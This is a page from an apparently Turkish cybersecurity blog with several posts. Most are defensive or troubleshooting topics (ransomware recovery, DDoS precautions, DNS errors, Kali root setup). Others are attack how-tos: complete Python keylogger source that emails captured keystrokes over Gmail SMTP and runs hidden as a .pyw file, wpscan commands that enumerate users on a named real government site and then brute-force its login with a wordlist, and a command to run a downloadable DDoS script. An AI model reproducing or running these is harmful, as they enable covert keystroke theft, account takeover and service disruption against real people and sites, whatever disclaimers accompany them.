Home Blog Page 2

Brute Force WordPress Sites

0


What is Brute Force:

In Turkish, Brute Force Attack; In its simplest terms, it is the attempt of a password list to the target system. For this, password lists consisting of millions of passwords can be prepared, these prepared password lists are called “word lists”. They can be integrated and produced specifically for the person and the system. In our previous articles, we have shown how to create a “world list” specific to the person or the system. These “word lists” can be tried in a serial way to log in to the systems. The simplest thing to do to protect against Brute Force Attack is to create passwords that are hard to guess and not to use common characters (for example: 123456) in passwords.


Now let’s come to our main topic, Brute Force WordPress Sites:

The tool we need is “WpScann”. The operating system, created for hackers and cybersecurity professionals, where you can easily perform penetration tests, comes pre-installed on Kali Linux.

WpScann is a special penetration testing program created for WordPerss sites. Of course, we show you to use it for educational purposes, as www.siberguvenlikblogu.com we are not responsible for its use for malicious purposes.

One of the things we need is Admin’s username, usually “admin”, but it won’t be the same for every WordPress site.

You can find the usernames on the target WordPress system with this command:

wpscan –url https://ihra2021.mfa.gr disable-tls-check –enumerate u

Now the code required to Brute Force Attack the found user:

wpscan –url target_url disable-tls-check –usernames target_user –passwords /usr/share/wordlists/rockyou.txt -t 3 –password-attack wp-login

To explain the parameters;

disable-tls-check: Required to bypass tls certificate check

–usernames: Username to Brute Force

–passwords: World List location

-t: threads 3 is our recommendation (you can make changes from site to site)

–password-attack: Parameter to Brute Force

wp-login: Admin Panel (this may not be the same on every site, but it’s like that for most WordPress sites)

It will automatically notify you of the password when the target logs into the system. You can login to the system with that username and password.

Finally, it should be noted that the WPScann Tool has a very complex structure and many parameters. There will be more detailed articles about WPScann in the future.

Activating Kali Linux Root User

0


What is Root Setting:

Root Authority is Root, that is, the most authorized user, in Linux-based operating systems such as Kali Linux. That is to have unlimited access to everything in the system.

In this article, what we will show is; As of Kali Linux 2020.1 the Root user is not set when installing automatically. This causes us to need the “sudo” command to run even the simplest command, for example, to use commands such as “ifconfig”. Then you need to enter the user password you set. This gets annoying after a while. After using the command we will give once to get rid of this situation, you will be able to activate the Root User account outside of your own user account and log in with the Root user.

sudo passwd root

With the command, we set the password of the Root account, which is not already removed but the password was not created when installing Kali Linux. It will ask you for your user password as you are using the sudo command. After entering the password correctly, you will set the root account password. Passwords will not appear, this is a security measure; Passwords are not visible in the terminal.

Then enter the switch user section or restart the system and log in with the root user. You will no longer use the “sudo” command and password to use any commands. You will have full authority on your system.

What’s Happening in Turkish Virtual?

0


Welcome to our news, “What’s Happening in the Turkish Virtual Realm”, where we will objectively describe the events, wars, all kinds of situations that have occurred in the Turkish Virtual Realm in the last months, and more. Cyber ​​Security Blog presents to you, our valued followers. Have a good read in our article, where we will touch on every subject without exception.

  • About Hacking of Turkish Sites that have increased in recent months:

Previously, we were observing hacking events of Turkish companies’ websites, Turkish blog sites, Turkish forum sites. However, it was not as busy as recently. According to our research before this article we prepared for you: Most Turkish sites are hacked by Turkish hackers or some hackers from Azerbaijan. It’s a deplorable situation. These attacks are due to very weak site security.

These attacks are not in the form of leaking data, but in the form of indexing the home page or a different part of the site. This shows us that some attacks such as “NoRedirect, Subdomain Takeover, Brute Force and Admin Panel login” have been carried out. Especially recently, most sites are hacked with the NoRedirect vulnerability in the Admin panel. This vulnerability is very easy to exploit and in our opinion, it’s not even a real hack. It saddens us that there are still such vulnerabilities on so many websites today.

So What Do Those Who Hack Turkish Sites Earn:

They do not earn anything financially. In some cases, the Admins of the sites may pay a certain amount of money to close and report the vulnerabilities. But this happens very rarely. Generally, lawsuits are filed and they are punished. They are definitely caught in one, if not all, and sooner or later justice will be served to those who do these things.

When we look at the indexes posted on Turkish sites, we see an internal competition and messages given to other hackers. In other words, we can observe that hackers do it in an effort to rise above the internal hierarchical order of the virtual world and to satisfy their egos. As it is easy to exploit the vulnerabilities, many Turkish websites fall victim to internal conflicts.

Big Turkish Sites Hacked? (edu.tr / gov.tr ​​/ bel.tr)

As with other sites, no monetary gain is made. We do not disclose vulnerabilities on these sites, as they will adversely affect our government. However, they can also be hacked with easily exploitable vulnerabilities. Unlike other sites, the penalties for attacks on these sites are heavier. Since hackers think that they will go further in the hierarchical order we mentioned by attacking these sites, they also attack these sites.

  • About DDOS Attacks


Although groups such as Anonymous generally take responsibility for DDOS attacks in our country, it is not known who carried out most of the attacks. However, there are many people dealing with DDOS in the virtual world. For a short time, they can close large sites. Botnet networks are often used in large attacks.

  • Fights and Wars

At the moment, there are enemy defenders and hackers, as always. These individuals attempt to Social Engineering each other to reveal their knowledge or humiliate their opponents by criticizing what they are doing. This is how fights usually go. It goes so far as to share each other’s identity and family information.

As a result of the fights, the number of Turkish websites hacked like a competition is increasing. Hackers brag about the sites they hacked, as if they were showing off.

  • Formerly in the middle of these works, he is currently continuing his career as a White Hat Hacker; We made an interview for you with a follower who did not want to be named.

What do you think about the increasing number of hacking Turkish websites in recent months?

“Young people, who spend a lot of time at home and on the computer due to the pandemic process, started to learn these jobs. Turkish hackers started to increase. They started by learning to hack Turkish sites because it is easy to hack most Turkish sites”

What do you think about people spreading each other’s private information as a result of online fights?

“Virtual exposures and fights are all show and show. They don’t know the responsibility for what they do and it’s a huge crime.”

Making Keyloggers with Python

0


What is Keylogger:

Keylogger, used as spyware and monitoring software, is a kind of malware that records every click you make on the keyboard and transmits it to another system. Because of the keylogger, your game accounts, social media accounts, messaging, credit cards, bank accounts and more are sent to others and hacked undesirably.

This type of software is based on secretly monitoring the keys on your keyboard. Malware is created by the person or people behind the system that records every click you make on the keyboard and sends it to see what you are typing on the keyboard.

In this article, we will make an effective keylogger using the Python software language. We create for educational purposes. As www.siberguvenlikblogu.com, we do not take any responsibility for its use for different purposes. At the same time, unlike our articles in our other Python series, instead of giving direct source codes; Firstly, we will explain the code fragments for your better understanding. Afterwards, we will provide all the source codes so that it is easy for you to use.

Let’s Get Built

First of all, we start by importing the libraries we need, “pynput” and “smtplib”. We will record the keystrokes with the “pynput” library, and send the keystrokes recorded with the “smtplib” library to ourselves via mail.

import pynput
import smtplib

from pynput.keyboard import Key,Listener

With this function we will record every keystroke on the target system.


count = 0
keys = []

def on_press(key):
global count,keys
count += 1
print("{0} basıldı".format(key))
keys.append(key)

if count >= 10:
count = 0
write_file(keys)
keys = []

With this function, we will create a file named “log.txt” and print the recorded keystrokes to that file.

def write_file(keys):
with open("log.txt" , "a" , encoding="utf-8") as file:
for key in keys:

k = str(key).replace("'", "")
if k.find("space") > 0:
file.write("n")
elif k.find("Key") == -1:
file.write(k)

With our last function, we will ensure that the recorded keystrokes are sent by e-mail to the e-mail address we specified each time the target system presses the “esc” key. The e-mail address that will send us the log records must be “gmail”. Another thing to note is that:

You need to enable the “Less Secure Application Access” section, which is optionally offered by Gmail, which is disabled for accounts without two-step verification, from this link. If you skip this, it will not send an e-mail.

def on_release(key):
if key == Key.esc:
from email.mime.text import MIMEText
with open('log.txt') as fp:

msg = MIMEText(fp.read())

msg[

'Subject'] = 'Log Kayıtları -> {}'.format("log.txt")
msg[
'From'] = "gonderilecek_mail_adresi"
msg['To'] = "gonderilecek_mail_adresi"


s = smtplib.SMTP("smtp.gmail.com",587)
s.ehlo()
s.starttls()
s.login(
"gönderecek_mail_adresi(@işareti ve sonrası olmayacak)",mailin_şifresi)
s.send_message(msg)
s.quit()

Here is all the source code of our Keylogger, which we have explained piece by piece;

import pynput
import smtplib

from pynput.keyboard import Key,Listener

count = 0
keys = []

def on_press(key):
global count,keys
count += 1
print("{0} basıldı".format(key))
keys.append(key)

if count >= 10:
count = 0
write_file(keys)
keys = []

def write_file(keys):
with open("log.txt" , "a" , encoding="utf-8") as file:
for key in keys:

k = str(key).replace("'", "")
if k.find("space") > 0:
file.write("n")
elif k.find("Key") == -1:
file.write(k)

def on_release(key):
if key == Key.esc:
from email.mime.text import MIMEText
with open('log.txt') as fp:

msg = MIMEText(fp.read())

msg['Subject'] = 'Log Kayıtları -> {}'.format("log.txt")
msg['From'] = "gonderilecek_mail_adresi"
msg['To'] = "gonderilecek_mail_adresi"


s = smtplib.SMTP("smtp.gmail.com",587)
s.ehlo()
s.starttls()
s.login("gonderecek_mail_adresi(@isareti ve sonrası olmayacak)","mailin_sifresi")
s.send_message(msg)
s.quit()

with Listener(on_press = on_press, on_release = on_release) as listener:
listener.join()

You will save this as a .pyw file, that is, Python No Console, so that the console does not open while it is running. It will continue to run in the background until you turn off the computer or turn it off from the task manager. There are also ways to fix it to the beginning and not to close, but we do not share it because it will have very dangerous consequences.

Who is this Qualin?

0


Major Cyber ​​Attacks from Hacker Codenamed Qualin:

Last week, many large Turkish websites were hacked by a hacker named Qualin or otherwise known as Qualwin. Among the hacked sites, there are many Turkish State Sites, State Universities, Sites of the Ministry of National Education and Municipal Sites. Qualin, who had made a name for himself with the attacks on Municipal Estates and large estates before, did something that would make more noise this time. Although there is not much coverage in the press and Official Statements have not been made yet, the hacked sites are very serious and important sites.

The sites hacked by Qualin in the same week are as follows;

  • Western Black Sea Development Agency
  • Many Sub-Domains of Kırıkkale University
  • Ministry of National Education .k12 Domain
  • Erzurum Askale Municipality
  • European University of Lefke

What Is The Purpose Of These Attacks?

Qualin, also known as Qualwin, is hacking with the philosophy of “Unsecured Sites and Vulnerable Sites Are Doomed to Destruction”, as understood from the messages given by the hacker codenamed Qualwin. This shows that for hackers like Qualin, the importance and size of the site means nothing. Likewise, in the indexes of the sites; In the messages given, it is understood that he is against Violence against Women.

You can reach the records of the attacks made last week by Qualin here;

What is Ransomware?

0


What is Ransomware?

Ransomware: Ransomware is a type of malware that forces the victim to do their thing by threatening to access, publish, or delete sensitive personal data without permission.

Ransomware is malware that somehow blocks and restricts access to files on target systems. In order for us to regain access, we are usually asked to pay with cryptocurrencies such as Bitcoin.

This malware works on the principle of encrypting files and blocking access to files by changing the file extension in a special way. Passwords placed on files and changed extensions can be corrected and restored by the people who programmed the Ransomware software or by cyber security companies.

How Ransomwares Spread

In our country, generally; It infects computers with e-mails containing fake e-invoices. Like a computer worm, it infects other computers and systems in the network. The most common ransomware in our country is the software called CryptoLocker. So much so that on the websites of official government offices, articles containing ways to get rid of this ransom virus are shared.

How to Recover Files Infected by Ransomware

It is possible to restore most of the encrypted and changed extension files. For this, cybersecurity companies have software to recover your files without having to pay the hackers money. There are many ransomware decryption software out there as a different method is used for each different extension and encryption method.

You can find Kaspersky’s Free Ransomware Resolvers, the solution for most ransomware, at this link. When you enter the encrypted file extension in the search box that appears, you will see that it was created for that Ransomware; It allows you to use solution tools for free.

Massive Ransomware Attacks Worldwide

Ransomware viruses such as WannaCry, which target Windows operating systems, caused a global crisis around the world. Big companies have lost billions of dollars because of these Ransom Viruses that have affected almost all countries. In our country, large companies have paid hackers huge sums of money for Ransom Viruses. Even the intelligence agencies of countries have stepped in for some Ransom Viruses.

How to Get Free VDS?

0


What is VDS? :

VDS, in short, are private non-shared servers. The word VDS consists of the initials of the words Virtual Dedicated Server. It means Private Virtual Server. These are systems that are usually rented or purchased at a paid price.

In this article, we will show you how to get VDS for free and unlimited. You can use Linux systems or Windows systems as the operating system in VDSs. An example of a Linux operating system is Centos. An example of a Windows operating system is Windows 10.

Internet speeds of VDSs are quite high. Since the internet is provided from the server, it is much higher than the internet speeds we use at home. Thanks to VDS, you will be able to perform your transactions not with your own network, but on a very fast network created specifically for you.

How to Get Free and Unlimited VDS Service? :

In this article, as Cyber ​​Security Blog; We will show you how to get free and unlimited VDS service in operating systems such as Ubuntu-based, Debian-based, RPM-based, Windows 10 and Parrot Os.

The system we will use is completely free and unlimited. However, when you stay AFK for a certain period of time (10 Minutes), that is, if you do not perform any activity or switch to another window, the system will turn itself off. To add that, in order to use commands such as “sudo”, the password of the created VDS is 123456.

Actions You Will Take:

First we go to https://www.onworks.net/os-distributions/ web – address. We choose the operating system we want without the need for any registration or membership creation. There are almost all operating systems that are widely used in the world. When we enter the interface of the operating system we have chosen, we press the Run Online button.

It should be noted that systems that block trackers and ads, such as AdBlocker, are turned off. While this system provides free Hosting, VDS service, it does not allow entry with AdBlocker as it only earns money from advertising revenues. If you have, you can use the system for free and unlimited after turning off AdBlocker.

After pressing the “Start” button on the screen, it will prepare the VDS for you. After waiting for an average of 20 seconds, you can log in and use your free VDS unlimitedly. We have launched Parrot OS as an example, you can choose the operating system you want.

How to Uninstall Blogger Mobile Extension (?m=1)

0


What is Blogger Mobile Extension? :

When the sites with Blogger infrastructure are accessed via mobile devices, “?m=1” is added to the end of the URL. This is the Blogger Mobile Extension. When we searched, we could not find many Turkish resources about removing this extension. In some foreign sources, there is a solution for a certain fee. In most Blogger themes, Google only indexes desktop URL extensions, causing the Blogger mobile extension (?m=1) to appear on mobile devices.

As Cyber ​​Security Blog, in this article, we will show you how to get rid of the Blogger mobile extension (?m=1) completely free of charge. The action we will take will never affect systems such as Google AdSense. It only allows you to remove the Blogger mobile extension (?m=1) at the end of the URL.

Actions You Should Do:

First of all, go to the edit page of your blog at https://www.blogger.com/. Enter the theme section.

On the screen that comes up, enter the HTML editing section from the menu next to the customize section.

Using the CTRL+F combination from the code screen that appears. Search for command and paste the code in one line below.

<script>
//<![CDATA[
/*! Siber Güvenlik Blogu - www.siberguvenlikblogu.com */
var uri = window.location.toString(); if (uri.indexOf("%3D","%3D") > 0) { var clean_uri = uri.substring(0, uri.indexOf("%3D")); window.history.replaceState({}, document.title, clean_uri);} var uri = window.location.toString(); if (uri.indexOf("%3D%3D","%3D%3D") > 0) { var clean_uri = uri.substring(0, uri.indexOf("%3D%3D")); window.history.replaceState({}, document.title, clean_uri);} var uri = window.location.toString(); if (uri.indexOf("&m=1","&m=1") > 0) { var clean_uri = uri.substring(0, uri.indexOf("&m=1")); window.history.replaceState({}, document.title, clean_uri); } var uri = window.location.toString(); if (uri.indexOf("?m=1","?m=1") > 0) { var clean_uri = uri.substring(0, uri.indexOf("?m=1")); window.history.replaceState({}, document.title, clean_uri);}; var protocol=window.location.protocol.replace(/:/g,''); if(protocol=='http'){ var url=window.location.href.replace('http','https'); window.location.replace(url);} /*]]>*/</script>

Then save your actions from the save button in the upper right.

Your transaction is complete. So easily you got rid of the Blogger mobile extension (?m=1). You can control it from a mobile device. In case of any error, you can forward your problem to us in the comments section or via the e-mail address contact@siberguvenlikblogu.com.

What is DDoS? How to Do a DDoS Attack?

0


What is DDoS?:

DDoS is the abbreviation of Distrubuted Denial of Service. It is a type of cyber attack that aims to temporarily or indefinitely disrupt a host service or services connected to the Internet, so that the service cannot be reached by users.

DDoS Attacks are translated into Turkish as “Distributed Denial of Service”. These types of attacks take advantage of the capacity limit that applies to any network resource, such as the infrastructure that provides a company’s website. A DDoS attack aims to exceed the website’s capacity to handle large numbers of requests and prevent it from working properly by sending multiple requests and packets to the attacked web resource at the same time.

Many companies have suffered great losses in DDoS attacks so far. Countries like America have increased penalties to prevent DDoS attacks. However, since most of the DDoS attackers cannot be found, the attacks cannot be prevented to a large extent. There are still many DDoS attacks in the world. You can watch live cyber attacks such as DDoS on our website by clicking here.

Precautions That Can Be Taken Against DDoS Attack:

Some measures you can take against DDoS attacks will be very effective. Of course, although it is not very effective against some Botnet attacks, the measures that will be effective against basic DDoS attacks;

  • Increase the maximum bandwidth your site can receive. However, this alone will not be enough. Since the number of packets sent in DDoS attacks will be very large, this will allow your site to resist DDoS attacks longer.
  • Integrate Anti DDoS software such as Cloudflare into your site. This type of software works by analyzing the traffic coming to your site and preventing suspicious traffic from entering the site. It is highly effective against DDoS attacks.
  • Configure your server to create security against attacks. If you do not have your own authorization, inform your hosting provider about this and take the necessary action.

You can protect yourself from DDoS attacks by taking basic precautions like these. However, these measures will of course not protect you from all attacks. Today, even very large companies and sites can be exposed to DDoS attacks and their systems can crash.

Botnets:

Botnet networks attack zombies with remotely controllable computers. Thanks to malicious software downloaded to the computer, your network and system are used in a DDoS Botnet attack without your knowledge. Anti DDoS software on Web-Sites is very difficult to prevent and generally cannot be prevented because it perceives these attacks as if they were a normal attempt. Therefore, Botnet attacks are quite dangerous.

How to Do a DDoS Attack? :

First of all, it is necessary to say that making a DDoS Attack is not legal and is shared with you for educational purposes only. Cyberguvenlikblogu.com is not responsible for any attacks.

In order to throw DDoS, systems with VDS or internet speed above certain levels are needed. If you do this with the networks you use at home, your own internet will also be affected by this situation, and your internet will be adversely affected depending on the number of packets sent.

An open source, powerful DDoS script written by the Admins of siberguvenlikblogu.com in Python language named “ddossonn.py” that we shared on Github:

https://github.com/emyounoone/ddossonn

You can start using it after downloading it using this link.

Use:

python ddossonn.py hedef_site_url

With this command, you can run the tool and throw DDoS.

How to Resolve DNS_PROBE_FINISHED_NXDOMAIN Error?

0
How to Resolve DNS_PROBE_FINISHED_NXDOMAIN Error? VPN or Firewall
How to Resolve DNS_PROBE_FINISHED_NXDOMAIN Error? VPN or Firewall

DNS_PROBE_FINISHED_NXDOMAIN error, as the name suggests, is caused by DNS.

There can be many reasons for this error. In this article, we will show you the methods to solve this annoying error that you encounter when you try to enter any site as the Cyber ​​Security Blog and this error is shown DNS_PROBE_FINISHED_NXDOMAIN error.

This error can have multiple causes. The main reasons that can cause DNS_PROBE_FINISHED_NXDOMAIN Error are:

  • Firewall and Antivirus Software
  • VPN
  • Browser Plugins
  • Malware
  • Problems from ISP (Internet Service Provider)

These reasons are the main factors that can cause your DNS settings to change, corrupt and give errors.

First of all, let’s briefly summarize the concept of DNS, namely Domain Name System, so that you can understand the reasons for this error:

DNS:

DNS stands for “Domain Name System”, that is, Domain Names Service. Converts hostnames to IP addresses. For example, when you want to enter a website, you visit it by entering the domain name of that site, for example siberguvenlikblogu.com, but in the background DNS servers operate with the IP address. In this way, instead of memorizing and manually entering the IP address of a website to enter a website, a practical and easy visit is provided by using the domain name. DNS is actually a very important system for us.

To get rid of this error, you can forget the network you are connected to from the WiFi tab and connect again. After trying this process first, you may not get positive results, you can examine other causes and solutions that may cause this error.

Firewall and Antivirus Software Errors:

Firewall and Antivirus Programs inspect and filter Web-Sites before opening them to prevent harmful content. They can cause this error by blocking the DNS addresses they see as objectionable. You can avoid this error by reviewing the settings of your Firewall and Anti-Virus Software.

VPN Caused Errors:

VPN increases your privacy while surfing the internet. In this article, we have given detailed information about VPN. VPN networks change your DNS addresses. You may encounter DNS_PROBE_FINISHED_NXDOMAIN error while using VPN.

Browser Plugins Caused Errors:

Browser add-ons may not be as innocent as you think. Some browser plugins can also play with your DNS settings, causing DNS_PROBE_FINISHED_NXDOMAIN error. It is necessary to disable or directly remove suspicious plugins.

Errors Caused by Malware:

Any malware that has entered your computer can play with your DNS settings or even render it completely unusable. In order to solve the error caused by malicious software, you can scan your device with a solid Anti-Virus software and clean the viruses. At the same time, formatting is an easy but effective solution for viruses.

Issues from ISP (Internet Service Provider):

If you are sure that not all solutions work or there is no reason, it may be an error from your ISP. To resolve this, you can call your ISP and report the situation. If the problem is caused by the ISP, they will fix it.

Command to Reset (clear) your DNS Settings:

Windows Command line respectively;

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

You can clear your DNS addresses by typing commands.

Source link

en_USEnglish